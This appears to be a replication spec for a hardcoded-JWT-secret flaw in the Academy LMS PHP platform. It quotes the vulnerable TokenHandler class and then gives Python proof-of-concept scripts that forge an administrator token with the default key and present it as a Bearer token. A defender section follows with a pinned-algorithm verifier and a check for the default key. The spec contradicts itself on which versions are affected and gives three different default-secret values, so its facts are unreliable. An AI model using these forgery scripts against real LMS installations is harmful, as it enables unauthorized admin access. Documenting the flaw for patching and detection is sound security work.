Replication Environment Tech Spec
Target Application Specification
- Product / version:
- Academy LMS v5.13 and below (the versions in which the vulnerable code was confirmed)
- Patched version: v6.15 and above / v6.14 and below are all affected
- PHP based (Creativeitem)
- Distribution: paid product, so the environment has to be built by hand
System Environment
- Minimum PHP / MySQL versions: PHP > 7.0, MySQL > 5.7.0 (Creativeitem)
Other requirements
1. Source code where the vulnerability was found (source)
// From lms/application/libraries/TokenHandler.php:6
// JWT::encode / JWT::decode are assumed to come from the firebase/php-jwt library
// (the call signatures match its v5 API).
class TokenHandler
{
    // The signing key is a fixed string shipped with every installation.
    // Anyone who reads it from the source can mint tokens the LMS will accept.
    private $key = "academy-lms-xxxxxxxx";

    // Generate a token: HS256 with the hardcoded key (library default algorithm)
    public function GenerateToken($data)
    {
        $jwt = JWT::encode($data, $this->key);
        return $jwt;
    }

    // Decode the token: verifies the HS256 signature with the same hardcoded key
    public function DecodeToken($token)
    {
        $decoded = JWT::decode($token, $this->key, array('HS256'));
        $decodedData = (array) $decoded;
        return $decodedData;
    }
}
2. PoC
import jwt

# Known default secret from Academy LMS
secret = "academy-lms-xxxxxx"

# Forge admin token
payload = {
    "user_id": "1",
    "role_id": "1",
    "is_admin": True,
    "email": "admin@example.com"
}

# Generate malicious JWT
forged_token = jwt.encode(payload, secret, algorithm='HS256')
print(f"Forged Admin Token: {forged_token}")
3. Pseudo-code
payload
{
    "user_id": 1,
    "role_id": 1,
    "is_admin": true,
    "email": "[email protected]"
}
Signing the JWT (attacker)
forged_token = JWT.encode(
    malicious_payload,
    hardcoded_secret,
    algorithm="HS256")
Reflection of the above
import jwt
import datetime

# Known default secret from Academy LMS
secret_key = "academy-lms-hardcoded-vulnerable"

# Forge admin token
# Payload crafted by the attacker (admin privileges)
payload = {
    "user_id": 1,
    "role_id": 1,
    "is_admin": True,
    "email": "[email protected]",
    # Expiry 5 hours from now; timezone-aware UTC avoids the deprecated utcnow()
    "exp": datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(hours=5)
}

# Generate malicious JWT (by attacker)
malicious_token = jwt.encode(payload, secret_key, algorithm="HS256")
print(f"Forged Admin Token: {malicious_token}")

# Use this token in HTTP requests
# Authorization: Bearer <malicious_token>
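Added defender-side example (not the project's code and not the PoC above): a stdlib-only HS256 verifier that pins the algorithm, requires an exp claim and checks it, plus a detection helper that flags any token still validating under the shipped default key (so an operator can confirm after patching that the key was really rotated) and a hardened issuer that takes the secret from an environment variable. The variable name LMS_JWT_SECRET and the DEFAULT_SECRET value are assumptions; the page redacts the real default.

```python
import base64, hashlib, hmac, json, os, time
DEFAULT_SECRET = "academy-lms-xxxxxxxx"  # constructed placeholder; the page redacts the real default

def b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_hs256(claims, secret):
    # Same HS256 construction the PoC relies on, stdlib only
    head = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{head}.{body}".encode(), hashlib.sha256).digest()
    return f"{head}.{body}.{b64url_encode(sig)}"

def signature_valid(token, secret):
    # Pin alg to HS256 before touching the signature; compare the HMAC in constant time
    try:
        head, body, sig = token.split(".")
        header = json.loads(b64url_decode(head))
        given = b64url_decode(sig)
    except (ValueError, UnicodeDecodeError):
        return False  # malformed token is simply invalid
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return False
    expected = hmac.new(secret.encode(), f"{head}.{body}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, given)

def verify_hs256(token, secret, now=None):
    # Claims are returned only when signature and exp both check out
    if not signature_valid(token, secret):
        return None
    claims = json.loads(b64url_decode(token.split(".")[1]))
    now = int(time.time()) if now is None else now
    if not isinstance(claims.get("exp"), int) or claims["exp"] <= now:
        return None  # a token without exp (like the first PoC payload) is rejected
    return claims

def signed_with_default_secret(token):
    # Detection: a live token that validates under the shipped default means the key was never rotated
    return signature_valid(token, DEFAULT_SECRET)
def secret_is_acceptable(secret):
    return bool(secret) and secret != DEFAULT_SECRET and len(secret) >= 32
def issue_token(claims, secret=None, ttl=3600, now=None):
    # Hardened issuance: key from LMS_JWT_SECRET (assumed env var name), iat/exp always set
    secret = os.environ.get("LMS_JWT_SECRET") if secret is None else secret
    if not secret_is_acceptable(secret):
        raise RuntimeError("LMS_JWT_SECRET must be a strong, non-default value")
    now = int(time.time()) if now is None else now
    return sign_hs256({**claims, "iat": now, "exp": now + ttl}, secret)
```

Running signed_with_default_secret over tokens captured from an upgraded instance is a quick post-patch check: any hit means the default key is still in use.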